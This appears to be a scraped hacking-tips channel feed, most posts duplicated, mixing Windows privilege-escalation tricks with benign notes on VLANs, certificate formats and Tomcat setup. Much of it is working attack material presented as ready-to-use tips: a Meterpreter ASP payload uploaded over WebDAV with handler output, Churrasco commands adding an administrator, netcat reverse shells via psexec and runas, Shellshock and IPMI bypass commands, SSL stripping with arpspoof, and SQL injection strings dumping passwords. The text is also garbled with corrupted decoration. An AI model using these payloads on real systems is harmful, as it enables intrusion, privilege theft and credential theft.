GM328A reverse engineering, new firmware and Tetris!.pdf
4.9 MB
reverse engineering tutorial
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME Windows TRICKS :
Windows Privilege Escalation resource
http://www.fuzzysecurity.com/tutorials/16.html
Try the getsystem command using meterpreter - rarely works but is worth a try.
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Windows Server 2003 and IIS 6.0 WEBDAV Exploiting
http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html
msfvenom -p windows/meterpreter/reversetcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt
cadavar http://$ip
dav:/> put aspshell.txt
Uploading aspshell.txt to `/aspshell.txt':
Progress: [=============================>] 100.0% of 38468 bytes succeeded.
dav:/> copy aspshell.txt aspshell3.asp;.txt
Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.
dav:/> exit
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reversetcp
msf exploit(handler) > set LHOST 1.2.3.4
msf exploit(handler) > set LPORT 80
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
curl http://$ip/aspshell3.asp;.txt
* Started reverse TCP handler on 1.2.3.4:443
* Starting the payload handler...
* Sending stage (957487 bytes) to 1.2.3.5
* Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.
pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py
Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:
https://www.exploit-db.com/exploits/6705/
https://github.com/Re4son/Churrasco
c:\Inetpub>churrasco
churrasco
/churrasco/-->Usage: Churrasco.exe -d "command to run"
c:\Inetpub>churrasco -d "net user /add <username> <password>"
c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"
c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"
Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
python pyinstaller.py --onefile ms11-080.py
mx11-080.exe -O XP
Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell:
MS16-032 https://www.exploit-db.com/exploits/39719/
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Windows Run As - Switching users in linux is trival with the
Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).
C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:
C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME Windows TRICKS :
Windows Privilege Escalation resource
http://www.fuzzysecurity.com/tutorials/16.html
Try the getsystem command using meterpreter - rarely works but is worth a try.
meterpreter > getsystem
Metasploit Meterpreter Privilege Escalation Guidehttps://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Windows Server 2003 and IIS 6.0 WEBDAV Exploiting
http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html
msfvenom -p windows/meterpreter/reversetcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt
cadavar http://$ip
dav:/> put aspshell.txt
Uploading aspshell.txt to `/aspshell.txt':
Progress: [=============================>] 100.0% of 38468 bytes succeeded.
dav:/> copy aspshell.txt aspshell3.asp;.txt
Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.
dav:/> exit
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reversetcp
msf exploit(handler) > set LHOST 1.2.3.4
msf exploit(handler) > set LPORT 80
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
curl http://$ip/aspshell3.asp;.txt
* Started reverse TCP handler on 1.2.3.4:443
* Starting the payload handler...
* Sending stage (957487 bytes) to 1.2.3.5
* Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.
pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py
Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:
https://www.exploit-db.com/exploits/6705/
https://github.com/Re4son/Churrasco
c:\Inetpub>churrasco
churrasco
/churrasco/-->Usage: Churrasco.exe -d "command to run"
c:\Inetpub>churrasco -d "net user /add <username> <password>"
c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"
c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"
Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
python pyinstaller.py --onefile ms11-080.py
mx11-080.exe -O XP
Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell:
MS16-032 https://www.exploit-db.com/exploits/39719/
powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"
Powershell Priv Escalation Toolshttps://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Windows Run As - Switching users in linux is trival with the
SU command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).
C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:
C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
OffSec
Privilege Escalation - Metasploit Unleashed
Metasploit has a Meterpreter "getsystem" script, that will use a number of different techniques in attempt to gain SYSTEM level privileges on the remote target.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top Windows 10 Public Cve & Bugs :
CVE-2015-1769 MS15-085 - Vulnerability in Mount Manager - Could Allow Elevation of Privilege
CVE-2015-2426 ms15_078_atmfd_bof MS15-078 - exploits a pool based buffer overflow in the atmfd.dll driver
CVE-2015-2479 MS15-092 - Vulnerabilities in .NET Framework - Allows Elevation of Privilege
CVE-2015-2513 MS15-098 - Vulnerabilities in Windows Journal - Could Allow Remote Code Execution
CVE-2015-2423 MS15-088 - Unsafe Command Line Parameter
Passing - Could Allow Information Disclosure
CVE-2015-2431 MS15-080 - Vulnerabilities in Microsoft Graphics Component - Could Allow Remote Code Execution
CVE-2015-2441 MS15-091 - Vulnerabilities exist when Microsoft Edge improperly accesses objects in memory - allows remote code execution
CVE-2015-0057 exploits GUI component of Windows namely the scrollbar element - allows complete control of a Windows machine
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top Windows 10 Public Cve & Bugs :
CVE-2015-1769 MS15-085 - Vulnerability in Mount Manager - Could Allow Elevation of Privilege
CVE-2015-2426 ms15_078_atmfd_bof MS15-078 - exploits a pool based buffer overflow in the atmfd.dll driver
CVE-2015-2479 MS15-092 - Vulnerabilities in .NET Framework - Allows Elevation of Privilege
CVE-2015-2513 MS15-098 - Vulnerabilities in Windows Journal - Could Allow Remote Code Execution
CVE-2015-2423 MS15-088 - Unsafe Command Line Parameter
Passing - Could Allow Information Disclosure
CVE-2015-2431 MS15-080 - Vulnerabilities in Microsoft Graphics Component - Could Allow Remote Code Execution
CVE-2015-2441 MS15-091 - Vulnerabilities exist when Microsoft Edge improperly accesses objects in memory - allows remote code execution
CVE-2015-0057 exploits GUI component of Windows namely the scrollbar element - allows complete control of a Windows machine
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Verify Various Vulnerabilities
+ IPMI Cipher Suite Zero Authentication Bypass:
http://www.tenable.com/plugins/index.php?view=single&id=68931
Tools required:
ipmitool
freeipmi-tools
ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list
# Specifying Cipher Suite Zero
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword user list
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis status
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor
+ Bash Remote Code Execution (Shellshock)
http://www.tenable.com/plugins/index.php?view=single&id=77823
x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt
x: () { :;}; echo "Hacked" > /var/www/hacked.html
+ DNS Server Cache Snooping Remote Information Disclosure
http://www.tenable.com/plugins/index.php?view=single&id=12217
Nmap Script: dns-cache-snoop
http://nmap.org/nsedoc/scripts/dns-cache-snoop.html
nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' <target>
+ IP Forwarding Enabled
http://www.tenable.com/plugins/index.php?view=single&id=50686
Nmap Script: ip-forwarding
http://nmap.org/nsedoc/scripts/ip-forwarding.html
sudo nmap -sn <target> --script ip-forwarding --script-args='target=www.example.com'
Alternatives:
- Set VM's default gateway as the victim IP address and attempt to route elsewhere.
- http://pentestmonkey.net/tools/gateway-finder
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Verify Various Vulnerabilities
+ IPMI Cipher Suite Zero Authentication Bypass:
http://www.tenable.com/plugins/index.php?view=single&id=68931
Tools required:
ipmitool
freeipmi-tools
ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list
# Specifying Cipher Suite Zero
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword user list
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis status
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor
+ Bash Remote Code Execution (Shellshock)
http://www.tenable.com/plugins/index.php?view=single&id=77823
x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt
x: () { :;}; echo "Hacked" > /var/www/hacked.html
+ DNS Server Cache Snooping Remote Information Disclosure
http://www.tenable.com/plugins/index.php?view=single&id=12217
Nmap Script: dns-cache-snoop
http://nmap.org/nsedoc/scripts/dns-cache-snoop.html
nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' <target>
+ IP Forwarding Enabled
http://www.tenable.com/plugins/index.php?view=single&id=50686
Nmap Script: ip-forwarding
http://nmap.org/nsedoc/scripts/ip-forwarding.html
sudo nmap -sn <target> --script ip-forwarding --script-args='target=www.example.com'
Alternatives:
- Set VM's default gateway as the victim IP address and attempt to route elsewhere.
- http://pentestmonkey.net/tools/gateway-finder
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
Tenable
IPMI Cipher Suite Zero Authentication Bypass
The remote IPMI service is affected by an authentication bypass. (Nessus Plugin ID 68931)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Configure an Ethernet interface as a VLAN trunk
Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are 192.168.2.1/24 on VLAN 2 and 192.168.3.1/24 on VLAN 3.
+ First install the vlan package if it is not already present:
apt-get install vlan
+ Turn off network-manager
sudo stop network-manager
+ Configuring interfaces
vconfig add eth0 <VLAN ID> (you may get a warning message on the first one)
example: vconfig add eth0 101
ifconfig eth0.<VLAN ID> <IP Address>/24 up
example: ifconfig eth0.101 192.168.1.10/24 up
ifconfig eth0.<VLAN ID>
Note: If any issues run, ifconfig eth0 0.0.0.0 up
Note: Specify interface with nmap scanning (nmap -e eth0.101)
Note: You will probably need to add individual routes for each vlan if you want to communicate between vlans, don't rely on your default gateway. (route add)
+ Remove Configuration
vconfig rem eth0.101
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Configure an Ethernet interface as a VLAN trunk
Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are 192.168.2.1/24 on VLAN 2 and 192.168.3.1/24 on VLAN 3.
+ First install the vlan package if it is not already present:
apt-get install vlan
+ Turn off network-manager
sudo stop network-manager
+ Configuring interfaces
vconfig add eth0 <VLAN ID> (you may get a warning message on the first one)
example: vconfig add eth0 101
ifconfig eth0.<VLAN ID> <IP Address>/24 up
example: ifconfig eth0.101 192.168.1.10/24 up
ifconfig eth0.<VLAN ID>
Note: If any issues run, ifconfig eth0 0.0.0.0 up
Note: Specify interface with nmap scanning (nmap -e eth0.101)
Note: You will probably need to add individual routes for each vlan if you want to communicate between vlans, don't rely on your default gateway. (route add)
+ Remove Configuration
vconfig rem eth0.101
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SSL Strip
Kali-Ubuntu-parrot pre installed tool
#FastTips
1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward
2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
3) sslstip.py -l 8080 -f lock.ico
4) Run arpspoof to redirect traffic to your machine (as root):
arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>
ENJOYβ€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SSL Strip
Kali-Ubuntu-parrot pre installed tool
#FastTips
1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward
2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
3) sslstip.py -l 8080 -f lock.ico
4) Run arpspoof to redirect traffic to your machine (as root):
arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>
ENJOYβ€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦[+] Union Based SQL Injection
' or 1=1#
1' ORDER BY 10#
1' UNION SELECT version(),2#
1' UNION SELECT version(),database()#
1' UNION SELECT version(),user()#
1' UNION ALL SELECT table_name,2 from information_schema.tables#
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#
1' UNION ALL SELECT concat(user,char(58),password),2 from users#
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦[+] Union Based SQL Injection
' or 1=1#
1' ORDER BY 10#
1' UNION SELECT version(),2#
1' UNION SELECT version(),database()#
1' UNION SELECT version(),user()#
1' UNION ALL SELECT table_name,2 from information_schema.tables#
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#
1' UNION ALL SELECT concat(user,char(58),password),2 from users#
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦India plans to set up a regulatory agency to limit the data dominance of giants such as Google Facebook
#News
> Netease Technology News, July 13th, according to foreign media reports, an expert committee appointed by the Indian government recommended that India need to establish a new data regulator to monitor the collection of online information sharing, monetization and privacy issues, in order to restrict Google , Facebook, Amazon, Uber and other US technology giants dominate online data.
>The committee of eight experts submitted a report saying that market forces alone will not bring the greatest benefit to society from the data, and the new regulatory agency must address the resulting key issues. The report recommends that this agency must ensure that all stakeholders comply with the rules, provide data when making legal requests, assess the risks of re-identifying anonymous personal data, and help create a level playing field for businesses.
> The document said that American technology giants such as Facebook, Amazon, Uber, and Google have a first-mover advantage and are the beneficiaries of the network effect, causing many new entrants and startups to be squeezed and facing huge barriers to entry. The envisioned role of regulators in facilitating data sharing will be to mitigate these effects and stimulate innovation, economic growth and social well-being.
> As countries around the world strengthen domestic data protection, India is drafting and strengthening policies to manage its booming digital economy. India has enacted a law governing the use of personal data, and the latest report also recommends legislation to increase the supervision of non-personal data. Non-personal data refers to information that does not include names, ages, or addresses that can be used to identify individuals. It also includes information that was originally private, but was later aggregated into anonymous data.
>The rules proposed in the report will govern data collection, analysis, sharing, and destruction. According to the report, the purpose of this move is to provide insight to existing companies and encourage the creation of new businesses, thereby exploring the βhugeβ social and public value of data.
> The committee recommends creating new "data business" classifications for companies that collect, process, store, or otherwise manage data. These companies include health, e-commerce, Internet and technical services companies, and the committee consulted them before drafting the report. The data business is envisaged to cover various industry sectors.
#News
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦India plans to set up a regulatory agency to limit the data dominance of giants such as Google Facebook
#News
> Netease Technology News, July 13th, according to foreign media reports, an expert committee appointed by the Indian government recommended that India need to establish a new data regulator to monitor the collection of online information sharing, monetization and privacy issues, in order to restrict Google , Facebook, Amazon, Uber and other US technology giants dominate online data.
>The committee of eight experts submitted a report saying that market forces alone will not bring the greatest benefit to society from the data, and the new regulatory agency must address the resulting key issues. The report recommends that this agency must ensure that all stakeholders comply with the rules, provide data when making legal requests, assess the risks of re-identifying anonymous personal data, and help create a level playing field for businesses.
> The document said that American technology giants such as Facebook, Amazon, Uber, and Google have a first-mover advantage and are the beneficiaries of the network effect, causing many new entrants and startups to be squeezed and facing huge barriers to entry. The envisioned role of regulators in facilitating data sharing will be to mitigate these effects and stimulate innovation, economic growth and social well-being.
> As countries around the world strengthen domestic data protection, India is drafting and strengthening policies to manage its booming digital economy. India has enacted a law governing the use of personal data, and the latest report also recommends legislation to increase the supervision of non-personal data. Non-personal data refers to information that does not include names, ages, or addresses that can be used to identify individuals. It also includes information that was originally private, but was later aggregated into anonymous data.
>The rules proposed in the report will govern data collection, analysis, sharing, and destruction. According to the report, the purpose of this move is to provide insight to existing companies and encourage the creation of new businesses, thereby exploring the βhugeβ social and public value of data.
> The committee recommends creating new "data business" classifications for companies that collect, process, store, or otherwise manage data. These companies include health, e-commerce, Internet and technical services companies, and the committee consulted them before drafting the report. The data business is envisaged to cover various industry sectors.
#News
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Key and Certificate Formats
1οΈβ£Private keys and certificates can be stored in various formats, which means that you often have to convert them from one format to another. The most common formats are:
2οΈβ£Binary (DER) certificate
Contains an X.509 certificate in raw form using DER ASN.1 encoding.
3οΈβ£ASCII (PEM) certificate (s)
Contains a base64 encoded DER certificate in which ----- BEGIN CERTIFICATE ----- is used as the header, and ----- END CERTIFICATE ----- is used as the footer. Usually found with only one certificate per file, although some programs allow more than one certificate depending on the context. For example, older versions of the Apache web server require the server certificate to be one in one file, and all intermediate certificates in another.
4οΈβ£Binary (DER) key
Contains the private key in raw form using DER ASN.1 encoding. OpenSSL creates keys in its own traditional (SSLeay) format. There is also an alternative format called PKCS # 8 (defined in RFC 5208), but it is not used widely. OpenSSL can convert to and from PKCS # 8 format using the pkcs8 command .
5οΈβ£ASCII (PEM) key
Contains a DER64 key in base64 encoding , sometimes with additional metadata (for example, the algorithm used for password protection).
6οΈβ£PKCS # 7 Certificate
A complex format for transporting signed or encrypted data defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain. This format is supported by the keytool Java utility.
7οΈβ£PKCS # 12 (PFX) key and certificate (s)
A complex format that can store and protect a server key along with the entire certificate chain. Commonly encountered with extensions .p12 and .pfx . This format is commonly used in Microsoft products, but is also used for client certificates. Nowadays, the name PFX is used as a synonym for PKCS # 12, although in the old days, PFX meant a different format (earlier version of PKCS # 12). It is unlikely that you will meet the old version anywhere.
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Key and Certificate Formats
1οΈβ£Private keys and certificates can be stored in various formats, which means that you often have to convert them from one format to another. The most common formats are:
2οΈβ£Binary (DER) certificate
Contains an X.509 certificate in raw form using DER ASN.1 encoding.
3οΈβ£ASCII (PEM) certificate (s)
Contains a base64 encoded DER certificate in which ----- BEGIN CERTIFICATE ----- is used as the header, and ----- END CERTIFICATE ----- is used as the footer. Usually found with only one certificate per file, although some programs allow more than one certificate depending on the context. For example, older versions of the Apache web server require the server certificate to be one in one file, and all intermediate certificates in another.
4οΈβ£Binary (DER) key
Contains the private key in raw form using DER ASN.1 encoding. OpenSSL creates keys in its own traditional (SSLeay) format. There is also an alternative format called PKCS # 8 (defined in RFC 5208), but it is not used widely. OpenSSL can convert to and from PKCS # 8 format using the pkcs8 command .
5οΈβ£ASCII (PEM) key
Contains a DER64 key in base64 encoding , sometimes with additional metadata (for example, the algorithm used for password protection).
6οΈβ£PKCS # 7 Certificate
A complex format for transporting signed or encrypted data defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain. This format is supported by the keytool Java utility.
7οΈβ£PKCS # 12 (PFX) key and certificate (s)
A complex format that can store and protect a server key along with the entire certificate chain. Commonly encountered with extensions .p12 and .pfx . This format is commonly used in Microsoft products, but is also used for client certificates. Nowadays, the name PFX is used as a synonym for PKCS # 12, although in the old days, PFX meant a different format (earlier version of PKCS # 12). It is unlikely that you will meet the old version anywhere.
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Firewall Bypass for Cloudflare, Incapsula, SUCURI Web Applications : Possible ?
Web application firewalls (Web Application Firewall - WAF) are web server add-ons (modules) (such as mod_security for Apache), or services (such as Cloudflare, Incapsula, SUCURI) that before transmitting a web request from a user -server, analyze it and, if it can be dangerous, block it or modify it.
Application firewalls can additionally perform intrusion detection and prevention functions.
If WAF is a web server module, then this software runs on the same server (computer). If WAF is a separate service, then the scheme of work is as follows:
1) The website to be protected runs on the same server without protection.
2) In the DNS record A, the IP addresses of the web application firewall, that is, Cloudflare, Incapsula, SUCURI or some other, are indicated as the IP of this site
3). After that, when accessing the protected website, all requests are already sent to the Cloudflare, Incapsula, SUCURI or equivalent service
4) This service receives a request, processes it and makes a request to the source server (which, I recall, is not even protected), receives from it the desired page / data and redirects to the requesting user.
π¦For a normal visitor connecting to a website, there is no difference; everything happens unnoticed. But for website audit purposes, file firewalls can become problems. WAF blocks malicious requests and protects against (D) DoS attacks. At the same time, no requests from scripts (bots) can be accepted at all - they are filtered out at the initial stage, or at the stage of passing captcha, which makes it impossible to use tools such as WPScan , sqlmap and other programs to search for vulnerabilities and assess the security of the website. If in the case of WAFs built into the server (for example, mod_security), only one bypass option is possible - the design of such requests that deceive the rules based on patterns (patterns), then for WAF services there are two possible options:
1) The same as for regular WAFs - that is, an attempt to outsmart the rules;
2) Sending requests directly to the server, bypassing WAF.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Installing Bypass firewalls by abusing DNS history in Kali Linux:
1οΈβ£sudo apt install jq<font></font>
2οΈβ£git clone https://github.com/vincentcox/bypass-firewalls-by-DNS-history<font></font>
3οΈβ£cd bypass-firewalls-by-DNS-history/<font></font>
4οΈβ£bash bypass-firewalls-by-DNS-history.sh --help
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Firewall Bypass for Cloudflare, Incapsula, SUCURI Web Applications : Possible ?
Web application firewalls (Web Application Firewall - WAF) are web server add-ons (modules) (such as mod_security for Apache), or services (such as Cloudflare, Incapsula, SUCURI) that before transmitting a web request from a user -server, analyze it and, if it can be dangerous, block it or modify it.
Application firewalls can additionally perform intrusion detection and prevention functions.
If WAF is a web server module, then this software runs on the same server (computer). If WAF is a separate service, then the scheme of work is as follows:
1) The website to be protected runs on the same server without protection.
2) In the DNS record A, the IP addresses of the web application firewall, that is, Cloudflare, Incapsula, SUCURI or some other, are indicated as the IP of this site
3). After that, when accessing the protected website, all requests are already sent to the Cloudflare, Incapsula, SUCURI or equivalent service
4) This service receives a request, processes it and makes a request to the source server (which, I recall, is not even protected), receives from it the desired page / data and redirects to the requesting user.
π¦For a normal visitor connecting to a website, there is no difference; everything happens unnoticed. But for website audit purposes, file firewalls can become problems. WAF blocks malicious requests and protects against (D) DoS attacks. At the same time, no requests from scripts (bots) can be accepted at all - they are filtered out at the initial stage, or at the stage of passing captcha, which makes it impossible to use tools such as WPScan , sqlmap and other programs to search for vulnerabilities and assess the security of the website. If in the case of WAFs built into the server (for example, mod_security), only one bypass option is possible - the design of such requests that deceive the rules based on patterns (patterns), then for WAF services there are two possible options:
1) The same as for regular WAFs - that is, an attempt to outsmart the rules;
2) Sending requests directly to the server, bypassing WAF.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Installing Bypass firewalls by abusing DNS history in Kali Linux:
1οΈβ£sudo apt install jq<font></font>
2οΈβ£git clone https://github.com/vincentcox/bypass-firewalls-by-DNS-history<font></font>
3οΈβ£cd bypass-firewalls-by-DNS-history/<font></font>
4οΈβ£bash bypass-firewalls-by-DNS-history.sh --help
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - vincentcox/bypass-firewalls-by-DNS-history: Firewall bypass script based on DNS history records. This script will searchβ¦
Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters. - vincentcox/byp...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Random linux tips :
> for Configure two tomcat project deployments on a virtual machine
> Turn off the firewall and selinux
1οΈβ£[root@keiv~]# systemctl stop firewalld
2οΈβ£[root@keiv ~]# systemctl disable firewalld
3οΈβ£Removed symlink /etc/systemd/system/multi-user.target.wants/firewalld.service.
4οΈβ£Removed symlink /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.service.
5οΈβ£[root@keiv ~]# setenforce 0
6οΈβ£[root@keiv ~]# sed -ri 's/^(SELINUX=).*/\1disabled/g' /etc/selinux/config
π¦Install jdk environment
1οΈβ£[root@keiv ~]# yum -y install java-1.8.0-openjdk java-1.8.0-openjdk-devel
2οΈβ£[root@keiv ~]# java -version
openjdk version "1.8.0_181"
> OpenJDK Runtime Environment (build 1.8.0_181-b13)
OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)
π¦tomcat deployment
Download tomcat
[root@keiv ~]# cd /usr/src/
[root@keiv src]# wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.8/bin/apache-tomcat-9.0.8.tar.gz
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Random linux tips :
> for Configure two tomcat project deployments on a virtual machine
> Turn off the firewall and selinux
1οΈβ£[root@keiv~]# systemctl stop firewalld
2οΈβ£[root@keiv ~]# systemctl disable firewalld
3οΈβ£Removed symlink /etc/systemd/system/multi-user.target.wants/firewalld.service.
4οΈβ£Removed symlink /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.service.
5οΈβ£[root@keiv ~]# setenforce 0
6οΈβ£[root@keiv ~]# sed -ri 's/^(SELINUX=).*/\1disabled/g' /etc/selinux/config
π¦Install jdk environment
1οΈβ£[root@keiv ~]# yum -y install java-1.8.0-openjdk java-1.8.0-openjdk-devel
2οΈβ£[root@keiv ~]# java -version
openjdk version "1.8.0_181"
> OpenJDK Runtime Environment (build 1.8.0_181-b13)
OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)
π¦tomcat deployment
Download tomcat
[root@keiv ~]# cd /usr/src/
[root@keiv src]# wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.8/bin/apache-tomcat-9.0.8.tar.gz
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
